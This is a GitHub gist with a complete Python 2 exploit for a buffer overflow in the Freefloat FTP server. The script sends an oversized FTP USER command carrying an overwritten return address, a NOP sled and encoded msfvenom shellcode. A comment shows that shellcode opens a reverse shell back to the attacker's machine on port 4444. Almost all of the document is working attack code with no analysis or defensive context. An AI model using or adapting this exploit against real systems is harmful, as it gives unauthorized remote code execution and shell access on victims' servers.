Created
December 24, 2018 22:02
-
-
Save dubs3c/6bae8a53b1dae9dea9c2a0fb3bd3a3b0 to your computer and use it in GitHub Desktop.
Freefloat FTP server buffer overflow exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import socket | |
import sys | |
# ============================================ | |
# [!] Freefloat FTP server Buffer Overflow Exploit | |
# [+] Tested on Windows 7 | |
# ============================================ | |
if len(sys.argv) == 1: | |
print("Usage: {script} <ip> <port>".format(script=sys.argv[0])) | |
sys.exit() | |
badchars = "\x00\x0a\x0d" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.13.132 LPORT=4444 -f python -b \x00\x0a\x0d -e x86/shikata_ga_nai --smallest | |
shellcode = "" | |
shellcode += "\xda\xd5\xbb\xd3\x95\x7b\xe6\xd9\x74\x24\xf4\x5a\x31" | |
shellcode += "\xc9\xb1\x52\x31\x5a\x17\x83\xea\xfc\x03\x89\x86\x99" | |
shellcode += "\x13\xd1\x41\xdf\xdc\x29\x92\x80\x55\xcc\xa3\x80\x02" | |
shellcode += "\x85\x94\x30\x40\xcb\x18\xba\x04\xff\xab\xce\x80\xf0" | |
shellcode += "\x1c\x64\xf7\x3f\x9c\xd5\xcb\x5e\x1e\x24\x18\x80\x1f" | |
shellcode += "\xe7\x6d\xc1\x58\x1a\x9f\x93\x31\x50\x32\x03\x35\x2c" | |
shellcode += "\x8f\xa8\x05\xa0\x97\x4d\xdd\xc3\xb6\xc0\x55\x9a\x18" | |
shellcode += "\xe3\xba\x96\x10\xfb\xdf\x93\xeb\x70\x2b\x6f\xea\x50" | |
shellcode += "\x65\x90\x41\x9d\x49\x63\x9b\xda\x6e\x9c\xee\x12\x8d" | |
shellcode += "\x21\xe9\xe1\xef\xfd\x7c\xf1\x48\x75\x26\xdd\x69\x5a" | |
shellcode += "\xb1\x96\x66\x17\xb5\xf0\x6a\xa6\x1a\x8b\x97\x23\x9d" | |
shellcode += "\x5b\x1e\x77\xba\x7f\x7a\x23\xa3\x26\x26\x82\xdc\x38" | |
shellcode += "\x89\x7b\x79\x33\x24\x6f\xf0\x1e\x21\x5c\x39\xa0\xb1" | |
shellcode += "\xca\x4a\xd3\x83\x55\xe1\x7b\xa8\x1e\x2f\x7c\xcf\x34" | |
shellcode += "\x97\x12\x2e\xb7\xe8\x3b\xf5\xe3\xb8\x53\xdc\x8b\x52" | |
shellcode += "\xa3\xe1\x59\xf4\xf3\x4d\x32\xb5\xa3\x2d\xe2\x5d\xa9" | |
shellcode += "\xa1\xdd\x7e\xd2\x6b\x76\x14\x29\xfc\xb9\x41\x3c\x78" | |
shellcode += "\x51\x90\x3e\x91\xfe\x1d\xd8\xfb\xee\x4b\x73\x94\x97" | |
shellcode += "\xd1\x0f\x05\x57\xcc\x6a\x05\xd3\xe3\x8b\xc8\x14\x89" | |
shellcode += "\x9f\xbd\xd4\xc4\xfd\x68\xea\xf2\x69\xf6\x79\x99\x69" | |
shellcode += "\x71\x62\x36\x3e\xd6\x54\x4f\xaa\xca\xcf\xf9\xc8\x16" | |
shellcode += "\x89\xc2\x48\xcd\x6a\xcc\x51\x80\xd7\xea\x41\x5c\xd7" | |
shellcode += "\xb6\x35\x30\x8e\x60\xe3\xf6\x78\xc3\x5d\xa1\xd7\x8d" | |
shellcode += "\x09\x34\x14\x0e\x4f\x39\x71\xf8\xaf\x88\x2c\xbd\xd0" | |
shellcode += "\x25\xb9\x49\xa9\x5b\x59\xb5\x60\xd8\x79\x54\xa0\x15" | |
shellcode += "\x12\xc1\x21\x94\x7f\xf2\x9c\xdb\x79\x71\x14\xa4\x7d" | |
shellcode += "\x69\x5d\xa1\x3a\x2d\x8e\xdb\x53\xd8\xb0\x48\x53\xc9" | |
eip = "\x03\xB5\x1C\x76" # 761CB503 | |
buffer = "A" * 230 + eip + "\x90" * 20 + shellcode | |
host = sys.argv[1] | |
port = int(sys.argv[2]) | |
s.settimeout(5) | |
try: | |
print("[+] Connecting to {host}:{port}".format(host=host,port=port)) | |
s.connect((host, port)) | |
data = s.recv(1024) | |
print(data) | |
print("[+] Sending payload...") | |
print("[+] Payload buffer size is {buffer} chars".format(buffer=len(buffer))) | |
s.send("USER {buffer} \r\n".format(buffer=buffer)) | |
print("\n[+] Payload has been delivered!") | |
s.close() | |
except Exception as e: | |
print("[-] Could not send send payload to host. Error: {e}".format(e=e)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment